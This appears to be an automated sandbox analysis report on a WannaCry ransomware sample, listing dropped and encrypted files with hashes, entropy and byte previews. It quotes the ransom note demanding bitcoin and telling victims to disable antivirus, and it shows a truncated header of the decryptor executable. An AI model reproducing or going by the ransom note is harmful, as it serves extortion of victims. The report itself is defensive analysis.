                                                  SSDEEP:24:bkC/IBWlK2phdkC21d/u9BMjrNj4MwSObF+iyuk/FYbPD1rgRbUPuID:bkRBCpkC2L/u9BaJpPK4ic/FODhgjID
                                                  MD5:3F28B30CABA03111DEAA61E3A6144E29
                                                  SHA1:5A63D1D1B5746B1AC5AB20C2B1BC0E9967079878
                                                  SHA-256:AF8EBD372CC6B218EB09CB5F4A60DC756E2A39836865328304B08F16541A99DE
                                                  SHA-512:EA4DE4E0431B476EE7666C7B6CB7F1E2E42E309B5C1238281EBF6F92D8944E4F358882FC09FB88E1427ED04E177BD011A343E51C2DE669BA38316B945E14529B
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!......R`.S.......'9.P.?..a.ta%...M[a.P.).A...e..-...(.a>..#.f:.._.\.6..8......1..pR..G[..]....u-.....g7!....E.e.z..*/..3.y..;.K...._u.........R.,....:...1......h....gy......./..>U.s...D.t.2D..c.jW4.t.:.n..^.a..t..0......Rf....j.......n.{.y$.y.a..............L....v.h..Sk(....@.8.....k#..e0=t...G..r...;...6.r.....HQ..k....{.lK..3..k:>....V1{.f...V.;.:;;.*:YaX. ...L..-r,v..L.yf...W`......".;..a.....jqa...H.......G{...}2...I..."....g..g&*AL&.$.C..s8..x.....s.C...m...2...A.....EN.\}...LVyS....'.L.<V..>...b..>.WT..s...q5ZqjD.\F.A..G.H..7._..+..~.8b..?.:?,a..X8r.n.Bl ...w3...L....RZ^.A..<Ut..Z.A.....k.u..9..h.~.h....m.qH.(......2.B.x.uyKdw.`...........:H...l._.$0...../;..|CtW.8ba.E.x......B....D.=./.c.8.B.*..v'.....*....PQ.Q..I....v.. Y.5H..'..!:k...|..9.e.5......jp......9..5.+k........tK{.....eP..l".......10......SVa....u....8...."_...oVm.jM.$.....e.m......G..U$V2.pB.(S..@.Gb..j..1.^+m.%..m.U!b......4..w...8?lY%!n..LZ.>."y.R.....}.

                                                  C:\Users\user\Documents\ZQIXMVQGAH\PWCCAWLGRE.pdf.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.8313791005395545
                                                  Encrypted:false
                                                  SSDEEP:24:bkC/IBWlK2phdkC21d/u9BMjrNj4MwSObF+iyuk/FYbPD1rgRbUPuID:bkRBCpkC2L/u9BaJpPK4ic/FODhgjID
                                                  MD5:3F28B30CABA03111DEAA61E3A6144E29
                                                  SHA1:5A63D1D1B5746B1AC5AB20C2B1BC0E9967079878
                                                  SHA-256:AF8EBD372CC6B218EB09CB5F4A60DC756E2A39836865328304B08F16541A99DE
                                                  SHA-512:EA4DE4E0431B476EE7666C7B6CB7F1E2E42E309B5C1238281EBF6F92D8944E4F358882FC09FB88E1427ED04E177BD011A343E51C2DE669BA38316B945E14529B
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!......R`.S.......'9.P.?..a.ta%...M[a.P.).A...e..-...(.a>..#.f:.._.\.6..8......1..pR..G[..]....u-.....g7!....E.e.z..*/..3.y..;.K...._u.........R.,....:...1......h....gy......./..>U.s...D.t.2D..c.jW4.t.:.n..^.a..t..0......Rf....j.......n.{.y$.y.a..............L....v.h..Sk(....@.8.....k#..e0=t...G..r...;...6.r.....HQ..k....{.lK..3..k:>....V1{.f...V.;.:;;.*:YaX. ...L..-r,v..L.yf...W`......".;..a.....jqa...H.......G{...}2...I..."....g..g&*AL&.$.C..s8..x.....s.C...m...2...A.....EN.\}...LVyS....'.L.<V..>...b..>.WT..s...q5ZqjD.\F.A..G.H..7._..+..~.8b..?.:?,a..X8r.n.Bl ...w3...L....RZ^.A..<Ut..Z.A.....k.u..9..h.~.h....m.qH.(......2.B.x.uyKdw.`...........:H...l._.$0...../;..|CtW.8ba.E.x......B....D.=./.c.8.B.*..v'.....*....PQ.Q..I....v.. Y.5H..'..!:k...|..9.e.5......jp......9..5.+k........tK{.....eP..l".......10......SVa....u....8...."_...oVm.jM.$.....e.m......G..U$V2.pB.(S..@.Gb..j..1.^+m.%..m.U!b......4..w...8?lY%!n..LZ.>."y.R.....}.

                                                  C:\Users\user\Documents\ZQIXMVQGAH\QNCYCDFIJJ.xlsx

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.805824408024066
                                                  Encrypted:false
                                                  SSDEEP:24:PNr9HCIwSSHZt7/hNuvjSw+lqhFkKEclLCZi5+czLoE/8pXH6:fHC3SaZt7/hNuOLlaFkKEclaEvME/R
                                                  MD5:FEF28180F5DEFA1FE68487728B4949BE
                                                  SHA1:9B3F86BB55B017EEA1F784E10CD283D26CBBD7D9
                                                  SHA-256:6FEA34C9131DA3FF13A8ED6B813826AC8D89A5EFE391410FCD52A92A9654F466
                                                  SHA-512:45E2DBB228A894BBF4BBD31B6306DF91B7EA94F4002EFBD00580F323EB8A30FB5CE1C36B95C888D5788765C36AC096A4E4EDB0FAA782BE1A9778FF467E0E0F7D
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:....;....=.o.._/|..$.:. ....*.~u.H.TA0..*<.t....6M.....J.w...a....r.p...%~.....d.~(F.B7......a....._.. .6~.Nqc........'.q.>&...QbM}.M....f....H....XBI.!\.6../s[.$W.;.q..-O..7.g.<.......O...-.,.`.~j.8....I.9n.f{ZH..sV.*2S`..4nQ.._..-..~..../....dl.-_..j.0..i=..'F....GB5..!Y.[...n.[.....a..!..Z.Z.t^SX...O$....!..}.yC.x.K..n...o..^CVw'........[.6p....zd..\..Rb.Z......r-...,1..."".*.R{e3{ S.....eg....J.....Q]..1.....N.v..d".b.....}..."L0..jy~....U'..>1u..A:......j......w.:g.....aU.ar..2.f}...S5.Y....X.1[dO..-.b.._...&.!Pk....Y.V...-}.8Z...j......I.yo..a...#^.y..a.>..%.eXJ...*..1/.#b~..w.>'.2........l....1..c#.....j....J{......:sn....>_a.q.\.._...t.{..`N..u*7...S.:............KL..\.Q.......|...tu...I......@.G..ZBT.|...[..*.#..F9..W..w.Hw.....0q...p.O,..(v..S#}.X7.uf...ak..;!.R.Y...KH......`...[.@.J.*+.?!..S...6...@\.D..s!.Ax...[.x-v...q.......%UAA..3,z,`...L..".c}.X.x7.>h..!.si.q5..=.v.....2..Q..(Y.j.M...)...'.....5F6..w[b&.6\.\..|.....XK..yV36.(|.....

                                                  C:\Users\user\Documents\ZQIXMVQGAH\QNCYCDFIJJ.xlsx.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.851571144638738
                                                  Encrypted:false
                                                  SSDEEP:24:bkdy+LoKdlPkqY0g3Kpk3vuVNUiBw1lOKGw0KG4yUnzA9Hnl5cIFBBYhRTyB:bkdvprY0gjkUDIK44yUnzA9F5cIYmB
                                                  MD5:49551252F4CD68FBCCF7624883460557
                                                  SHA1:1CD2DD9CB29F6D0BC8A12188B5CF6515FF78C54F
                                                  SHA-256:16F12B0915521E1A5797C47CD8FBF7EB5FA284E22F5FC3FDE047BAAA2441DE91
                                                  SHA-512:6320CE8994ABBD2E3860F2F0376184B2F8386C9AEE649FDA8CC32ED1592B6A678A56A1FA402938443C4BCB1EFB645E0B4E5784D2011168851FA359F98C40D337
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!......cN.Rm"G..(P.$.J.....].O.....i6....<.8.nA..;..............!.:....m...yz..{,...Z.:.E.u.....I>>S...~.O.^).rXR..}n.9t......O.x.;1......y).9.~..L...$..\...9...M.t...S.;a.b+....].P..4.ZD..z.M..9...5.1.. A....{c0p.lIv..............&ux+2...&....j.................O..f.L.....\n......wqe..t...................U_44`...b..M.Z....w.v.D....$...%.a..........F^Eh..Mt...C..[....".h.v.\"%.69.o..1.%..R}......I..6.DT.S..........@g..w..xi..)q.$.@*......R..V.*....m...cL......R....!.b...43..-,...T-.z]..$..9o.r.'...y.......,..w.z...uor.y..T."HcT."...Y5J.|.J..../5.d.{V.-&...R...5..*.Xi.(d..4 .9\.......B...k..W....fJ@z....5...0.~....V.=...GA.>.."...`...{j.|E{d..:..i^....l2...wLs..f).l....d......(..........'uz...T...$...8A..-V3..:...L_...p..".....(.(...ZX.>..c...Y...0......._2.\R....?...k..;.+M@...9..\n..}......Wnz....3/2.`.tN.l@J.T.S.Z..)uW!G.......8.....;..z..%y..j.<(...K..?=.e.....T..f....R.B}U.l....d.{$.5.(..1.....jl?..a...<..7.N.Y`O..|....r=.....

                                                  C:\Users\user\Documents\ZQIXMVQGAH\QNCYCDFIJJ.xlsx.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.851571144638738
                                                  Encrypted:false
                                                  SSDEEP:24:bkdy+LoKdlPkqY0g3Kpk3vuVNUiBw1lOKGw0KG4yUnzA9Hnl5cIFBBYhRTyB:bkdvprY0gjkUDIK44yUnzA9F5cIYmB
                                                  MD5:49551252F4CD68FBCCF7624883460557
                                                  SHA1:1CD2DD9CB29F6D0BC8A12188B5CF6515FF78C54F
                                                  SHA-256:16F12B0915521E1A5797C47CD8FBF7EB5FA284E22F5FC3FDE047BAAA2441DE91
                                                  SHA-512:6320CE8994ABBD2E3860F2F0376184B2F8386C9AEE649FDA8CC32ED1592B6A678A56A1FA402938443C4BCB1EFB645E0B4E5784D2011168851FA359F98C40D337
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!......cN.Rm"G..(P.$.J.....].O.....i6....<.8.nA..;..............!.:....m...yz..{,...Z.:.E.u.....I>>S...~.O.^).rXR..}n.9t......O.x.;1......y).9.~..L...$..\...9...M.t...S.;a.b+....].P..4.ZD..z.M..9...5.1.. A....{c0p.lIv..............&ux+2...&....j.................O..f.L.....\n......wqe..t...................U_44`...b..M.Z....w.v.D....$...%.a..........F^Eh..Mt...C..[....".h.v.\"%.69.o..1.%..R}......I..6.DT.S..........@g..w..xi..)q.$.@*......R..V.*....m...cL......R....!.b...43..-,...T-.z]..$..9o.r.'...y.......,..w.z...uor.y..T."HcT."...Y5J.|.J..../5.d.{V.-&...R...5..*.Xi.(d..4 .9\.......B...k..W....fJ@z....5...0.~....V.=...GA.>.."...`...{j.|E{d..:..i^....l2...wLs..f).l....d......(..........'uz...T...$...8A..-V3..:...L_...p..".....(.(...ZX.>..c...Y...0......._2.\R....?...k..;.+M@...9..\n..}......Wnz....3/2.`.tN.l@J.T.S.Z..)uW!G.......8.....;..z..%y..j.<(...K..?=.e.....T..f....R.B}U.l....d.{$.5.(..1.....jl?..a...<..7.N.Y`O..|....r=.....

                                                  C:\Users\user\Documents\ZQIXMVQGAH\SQSJKEBWDT.png

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.781847511154211
                                                  Encrypted:false
                                                  SSDEEP:24:qtAFNSxi+jA+nx4aNTEANuEjIuQ8nkyhwKknT:YAFN8i4WaNpjBnO
                                                  MD5:3D86B521F5076A842802D1003427F0F8
                                                  SHA1:939BC8066C3DB59564B211A6DAA455C4F1725933
                                                  SHA-256:20B6BB7C51A62C21E4F2F8912C50AF9ADC5A52B4DF89C4F04C7B9AC4ED643941
                                                  SHA-512:B7D82C6A2F62DAB099E4D4F578A4E0E95A35C1EE265D72197E8634B13F9677E5BD4D48BEB7D0E308A797C078A284DCE3F86FBE8E376EDB3A83093CACA142CC88
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:..?..c.......=>.i.......3....`.}BW#..QI..~K....L.?.<.J.+[62O..L.f..V.ZhR....h.......v.AR.n.^&3.t.Q.]....'*.o....4.S....m......<...(b1I..........J.......d7..o.....-..yBG......^.5..d^..q1.`...N.a....j.%O.r.X.EZ.._.,t+jhf.......r.+].T...`h..+.&x......!..~.~c.u..GI.a..~.".H[...o!.....O....+....r&..F...1..L.Z..P..K...a..Q/...Z~..tP...sK...N...L..... .5&.q.E.9..I....A$2..51.Q....ir..C.H...."}.X....*..f<.<.LK.........j)d...M..YR.(...K<.x2d.A2......D..W}..Q.jP.iG......hl.U.B.@.....^h..$&....j..0K.2m.........7..8..M...>.2\qMu#.P.'.P.(..5...E.;?..G.-.......RMA,IcA..N:.%.d..].E...2k......y{.6..\%..i.....jA.Z.5.y7.U..$....L)......jz@..x.m...)..>OG...o.d.(U.3.#w......#Ys~.....PNQr.%....g_,...6.k............e.6u...I..s.4..q....-..D)S.<..........}"...'?UI.F.'K.h.d(.$>bgx.....Q./.._5@_l.[?E.UO..(.=.`.bu......0gO...I....+-V@.l.........mW-&Q.6a'?..qZ:..........jNy..5I.f.L..>b?...(.Z.ni..].....n_.?ym...>.B;#...z\.t/H..L,.....<..2U.,.jW;...4.....lV%._3.(.L._

                                                  C:\Users\user\Documents\ZQIXMVQGAH\SQSJKEBWDT.png.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.8359916517030275
                                                  Encrypted:false
                                                  SSDEEP:24:bkhPY6kX/Taa9dZRGGOdsfJORXkYO0VSwGiskyuVsdh7TZAKVldrYFNP/QrY5794:bkhPXkX+aBRGGnUlk0O+JVsJVldkXPIB
                                                  MD5:2FBCC999106D0C5054B345DCABDE7BCA
                                                  SHA1:FFA34695C1A98D557A09CE91BB81128F70826D12
                                                  SHA-256:774263CE538977EDC2D7F06821103BD0DB92A218E35F33136282BCC147DD2424
                                                  SHA-512:578094635365189F3E474BB18B98A70B2D1BD664BB4829D0EFA5F8F44B9A254A38337F28B33BEC89D48781FEDE0298771375F1388F8D3222EEB7E086B1C25417
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....T.q..l$Um....|. .}.D......|...U.._..jf.,..l.=.Pr|..w..*.B.x..{.J..%........_~.7.V.XUb..F...of.|...o)M...{...g..n...c......%B{C..9.&~...y..X..R4Q^...n9.q2.:.L+..'.h.^.....j<.g8._....sY.c%a..k.s.H6>...A......3WZ*!+..E..z!.^l......zn.z..R..............s64...Lc].&.......,.y.w..F.?.o1..>..y9.D..Y......GnY.(#.c...D.F.T..[.Q.c......>A..0.w....*O!.._Hy....(Zm/)c..L^..PI~....n..X.r...5.f8$.N....DZ7%...........0."Ns.gP.I....[.y.n......l>.....p.....>..*PtnV......p2..N.o.#7..-p.A...}V".c..+..0..V...|.....t....&.W~n&.w.@....a.Y.N....j...(.8..~0........i..~.A.m....j.O.o..J%e.^....WLoN...T...e.N.....n..0t.k..z.(.$....M..\...........v.@.G.y?.'+'...7.QS'......D3.......|....S.G_.{u.a"....'....x..a..w.....;..^...)=0....m..-.....#..2`......^gZ/u]...^.n...Y.%%..1..%{D^..:...S.A...Qf.%-Ms..p..&..@......u.)..4;..%.{..L.....f.g....,~Q..q..S...:_.U....Z(....`G<.../.e........^y.V....$.S..AI..qDDt..6.i49.{...4....v....?j@...D.U:9.T.....-..f....b...

                                                  C:\Users\user\Documents\ZQIXMVQGAH\SQSJKEBWDT.png.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.8359916517030275
                                                  Encrypted:false
                                                  SSDEEP:24:bkhPY6kX/Taa9dZRGGOdsfJORXkYO0VSwGiskyuVsdh7TZAKVldrYFNP/QrY5794:bkhPXkX+aBRGGnUlk0O+JVsJVldkXPIB
                                                  MD5:2FBCC999106D0C5054B345DCABDE7BCA
                                                  SHA1:FFA34695C1A98D557A09CE91BB81128F70826D12
                                                  SHA-256:774263CE538977EDC2D7F06821103BD0DB92A218E35F33136282BCC147DD2424
                                                  SHA-512:578094635365189F3E474BB18B98A70B2D1BD664BB4829D0EFA5F8F44B9A254A38337F28B33BEC89D48781FEDE0298771375F1388F8D3222EEB7E086B1C25417
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....T.q..l$Um....|. .}.D......|...U.._..jf.,..l.=.Pr|..w..*.B.x..{.J..%........_~.7.V.XUb..F...of.|...o)M...{...g..n...c......%B{C..9.&~...y..X..R4Q^...n9.q2.:.L+..'.h.^.....j<.g8._....sY.c%a..k.s.H6>...A......3WZ*!+..E..z!.^l......zn.z..R..............s64...Lc].&.......,.y.w..F.?.o1..>..y9.D..Y......GnY.(#.c...D.F.T..[.Q.c......>A..0.w....*O!.._Hy....(Zm/)c..L^..PI~....n..X.r...5.f8$.N....DZ7%...........0."Ns.gP.I....[.y.n......l>.....p.....>..*PtnV......p2..N.o.#7..-p.A...}V".c..+..0..V...|.....t....&.W~n&.w.@....a.Y.N....j...(.8..~0........i..~.A.m....j.O.o..J%e.^....WLoN...T...e.N.....n..0t.k..z.(.$....M..\...........v.@.G.y?.'+'...7.QS'......D3.......|....S.G_.{u.a"....'....x..a..w.....;..^...)=0....m..-.....#..2`......^gZ/u]...^.n...Y.%%..1..%{D^..:...S.A...Qf.%-Ms..p..&..@......u.)..4;..%.{..L.....f.g....,~Q..q..S...:_.U....Z(....`G<.../.e........^y.V....$.S..AI..qDDt..6.i49.{...4....v....?j@...D.U:9.T.....-..f....b...

                                                  C:\Users\user\Documents\ZQIXMVQGAH\ZQIXMVQGAH.docx

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.803341746289428
                                                  Encrypted:false
                                                  SSDEEP:24:yHkLJymbRt/LbFeuaUe5iGaeOT0VdkKVH1Z6:vLlhpeJLZ6
                                                  MD5:808744CED06394BCD0591F65D1DB7F80
                                                  SHA1:C60BD50AD196517BBA21745F1C829AFC201CE1DF
                                                  SHA-256:11B425FA61C9E77F0AA3F6467BB17C7D9563DE2DE7D2C42123D4983C252EF24C
                                                  SHA-512:AA0BF9A7C75583DF2BCE3C6A59DB0B5EF1ABACD1F4B0ACB4A31712D96C1177BE653E730C480FCBE577D06C3DCF58149A3AEDD950CD7A0253B5CCB7C442F9E29C
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:S....%L(.2..o..3...9$......mw.oj.Z..8..n..bif...=.C....;. g....}....Dn.....f......H.r.y... .....q...e..W.......\Vy... .M.....H.......U..Vr@.O.....\z..O.vH...}.j....1eD..,@..f<6`z....F.|..>......#U...$.g].<...........C...`.C.v...X.j.R.N..RQ..j".i..Z9.mV.....;..u,.....4...e..f7..6M..].....N.P-....2.YbN.^..f........q..y/rGyA.V".....!n...j|.H.M...?k..2lN......nJ.K(.I"2.1.........R.RW@.7..T...Af<...@...Mt*...2-.kPx^u]U&..@Ao..,guz........#...o.t.<.2W 7.....@c..7.X.t^..S....'3.>..|..8.c.!..[..?61.\xT^)..9u......&.C..E.M..AT=.&LG.......`....*.4..5......Z.....Az....T4z..>....ue....o...G.C.W..............+sX..&:...y.%5~=.>..g..>I.s.h.E'..........)..v.i.^.L...........D....P..6<H1..m.[.F...X.}5.:uG)+.................R.....u..W5(#=..(.;.M3B....+...W.ZL.i....Kr.8A]......._,.....7...R......+.~.c..D^...M..N..t.qE..._.%L. ...p.Z<.9;.VF......D.&3.}H..q..2.o.S..H..a...F.....r...'..tB.R....T...5A......B..UN.Qw...6.l...i.....|...N.y)...cs>.....j.......0....

                                                  C:\Users\user\Documents\ZQIXMVQGAH\ZQIXMVQGAH.docx.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.853958260002917
                                                  Encrypted:false
                                                  SSDEEP:24:bkDr6h19hezKn/mVd+Caonhj6ylOjZ/hpsUxXIPeOD5qxednZkSMszcAoZ6WM:bkvZKeVdpoylOV/jRUx5KedlMsz6Z6L
                                                  MD5:366E91DC658690E5864E061EFAD0A4DA
                                                  SHA1:F829B8FB11810993E4D74A0F83B4196A79DC87B1
                                                  SHA-256:DF1F56B9BD43DCAF10FA253AA5846F2DC36A47D962289869A5AC4083D6FBB4E9
                                                  SHA-512:A03F4C189EAF7911B2A8857089961FEBB082723344BB644B68DA555ABB543AF28E70940B7F93459BAFA032C4C2515BFE29989DC4E621F629A12BF18A657EADBA
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....C].wX.Z..h..r.....B...(S.J.....e.\....+2....8)_......=(..E.5.)_......M.&.....-w..u..f.....XK....GY{<.l...73:1.=.....;.p.K...]K.b..mN..V~..t.M..:9h....*.u]K.z..........ui[......)..Pe.."6.x...3,...dT)...4.j"..j(N..WZv..!U`^.."?...n[.&..<................*<.......@.R......nV....<..AxO...}..p.:.@+e........!.......|_0(....Z...xw\....s...J.A&..j+$..Dfd...X..y.w...&=:.......N.(....+...d.|....f\..>...k.......&&W.e.......t.f/...n.!/$.}.QI.7r.w..E.......@Q... I.g!......;O.0..d*.W..j...+.}..`.s:.}t.^....+..K.......+!C.x.+Q....-N.^.<{..Q.....p....I.iz...;e..^OO7..<...]y.....ai..x.].6[\....xt.......I..Q... .......p....r..v.....e....K...iDuG.........j.I...v3H..0.9.q.cn..9.}...,.....HV.Y.?X..aLc..."....N.$....7.=^..|:./.......d[..E.,3].)a...{....p+.y....pc.A.c....*..........kM......3\..../x.V...h.e[...k....2.AI...Tj..,...<w....P.jE<..O...}..>........gz......H..-.f..9.LE.....s..I....i<b.%m.U....l.'s...I....w......)B...W?....K/.....

                                                  C:\Users\user\Documents\ZQIXMVQGAH\ZQIXMVQGAH.docx.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.853958260002917
                                                  Encrypted:false
                                                  SSDEEP:24:bkDr6h19hezKn/mVd+Caonhj6ylOjZ/hpsUxXIPeOD5qxednZkSMszcAoZ6WM:bkvZKeVdpoylOV/jRUx5KedlMsz6Z6L
                                                  MD5:366E91DC658690E5864E061EFAD0A4DA
                                                  SHA1:F829B8FB11810993E4D74A0F83B4196A79DC87B1
                                                  SHA-256:DF1F56B9BD43DCAF10FA253AA5846F2DC36A47D962289869A5AC4083D6FBB4E9
                                                  SHA-512:A03F4C189EAF7911B2A8857089961FEBB082723344BB644B68DA555ABB543AF28E70940B7F93459BAFA032C4C2515BFE29989DC4E621F629A12BF18A657EADBA
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....C].wX.Z..h..r.....B...(S.J.....e.\....+2....8)_......=(..E.5.)_......M.&.....-w..u..f.....XK....GY{<.l...73:1.=.....;.p.K...]K.b..mN..V~..t.M..:9h....*.u]K.z..........ui[......)..Pe.."6.x...3,...dT)...4.j"..j(N..WZv..!U`^.."?...n[.&..<................*<.......@.R......nV....<..AxO...}..p.:.@+e........!.......|_0(....Z...xw\....s...J.A&..j+$..Dfd...X..y.w...&=:.......N.(....+...d.|....f\..>...k.......&&W.e.......t.f/...n.!/$.}.QI.7r.w..E.......@Q... I.g!......;O.0..d*.W..j...+.}..`.s:.}t.^....+..K.......+!C.x.+Q....-N.^.<{..Q.....p....I.iz...;e..^OO7..<...]y.....ai..x.].6[\....xt.......I..Q... .......p....r..v.....e....K...iDuG.........j.I...v3H..0.9.q.cn..9.}...,.....HV.Y.?X..aLc..."....N.$....7.=^..|:./.......d[..E.,3].)a...{....p+.y....pc.A.c....*..........kM......3\..../x.V...h.e[...k....2.AI...Tj..,...<w....P.jE<..O...}..>........gz......H..-.f..9.LE.....s..I....i<b.%m.U....l.'s...I....w......)B...W?....K/.....

                                                  C:\Users\user\Downloads\@Please_Read_Me@.txt

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):933
                                                  Entropy (8bit):4.708686542546707
                                                  Encrypted:false
                                                  SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                                  MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                                  SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                                  SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                                  SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....

                                                  C:\Users\user\Downloads\@WanaDecryptor@.exe

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):245760
                                                  Entropy (8bit):6.278920408390635
                                                  Encrypted:false
                                                  SSDEEP:3072:Rmrhd5U1eigWcR+uiUg6p4FLlG4tlL8z+mmCeHFZjoHEo3m:REd5+IZiZhLlG4AimmCo
                                                  MD5:7BF2B57F2A205768755C07F238FB32CC
                                                  SHA1:45356A9DD616ED7161A3B9192E2F318D0AB5AD10
                                                  SHA-256:B9C5D4339809E0AD9A00D4D3DD26FDF44A32819A54ABF846BB9B560D81391C25
                                                  SHA-512:91A39E919296CB5C6ECCBA710B780519D90035175AA460EC6DBE631324E5E5753BD8D87F395B5481BCD7E1AD623B31A34382D81FAAE06BEF60EC28B49C3122A9
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 96%
                                                  Reputation:unknown
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%...a...a...a......b.......u.......`.....d.......j.......e...W...b...a.......W...s.......`...Richa...................PE..L.....[J.................@...p.......1.......P....@..................................................................................0..|............................................................................P...............................text....3.......@.................. ..`.rdata..h....P.......P..............@..@.data....2.......0..................@....rsrc...|....0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................

                                                  C:\Users\user\Downloads\BJZFPPWAPT.png.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.832587535588094
                                                  Encrypted:false
                                                  SSDEEP:24:bkyA9elMQH1XycgxeojdSPbSqdDgYy3fbzreUz6FYZGgnmo2xZ/M:bkyqelMaXOeojdObSqdS3HrNnmo27/M
                                                  MD5:363804D72CB5F2014F7192BEED380EDC
                                                  SHA1:EE1F5973992465D747708034DE80BA50C4F2E9B9
                                                  SHA-256:A647A14D32BF90D864AEF40BEA03251B16BC0BD0440FDB7DCD51892CE0728B29
                                                  SHA-512:BBE49C32D7EBEB2E65E2DB75CD09422FCE72EF7DB8D18707425903F5B3D23C93C770DECA6A4A7A370FD5E5242F93C3B33F94A85307FA2AF4E2C7CD262040954F
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....'[=.Z.r._9...NK.P._..o.).&Z.y8&.Y[..L.!:6.x...r.......$..,?......-.hE......o....!~5.w.......&...Y.W..2L...+... .e*.}.X...f.{.......Q..'._4.e..`.....T....\..:.M.|......Z..^..w}..%....^.e.....=..z].=j..\.5wut.....vq...T%..2..c..I*..t].eH2C.6I.pr............F.....l...0&......._._%O.n(.p..9./DYN._.?)p.p.o.,.p..X?.%u..}.....wO...\.%U,..Rg../.d.(n...d..\Q.l..-8...ZtQ[....+.*..>o.D..........v...!..,.%.'2Kh2....aR.......K..c..U.9G...T.S....3M.=V.#LX ....8=..hv}tB.P..Fo..*..r.O].xD"]..p..L.:.2.1..*2.%.........q.465.(.*......w7....y..I.nZ.......~.m.T:..G..-n7.].....B...M..F.4...5..-x.)b.....a.6.)..6{Q.~...UKD...Y...).}+.z}.C5...5.K_N...d.=#!.3:.....kk.:. .]......n>....\\..s-:<....|.4:)$.m...O&..|..........J}6....*%W...g..M.\.`..oh.......>....s..f...].4. .'o.....ai.....#.6K.1....... .......Skk...4....m.{.1.p.);.+p@PG...&v/..cv\.V..Ta"/..I.`....u...bZ....<.zk...>.#...{.DS...i....../.'.......w.;-7.......0j4......../9.u....IDX....}.7..........6.....

                                                  C:\Users\user\Downloads\BNAGMGSPLO.pdf.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.856430237778002
                                                  Encrypted:false
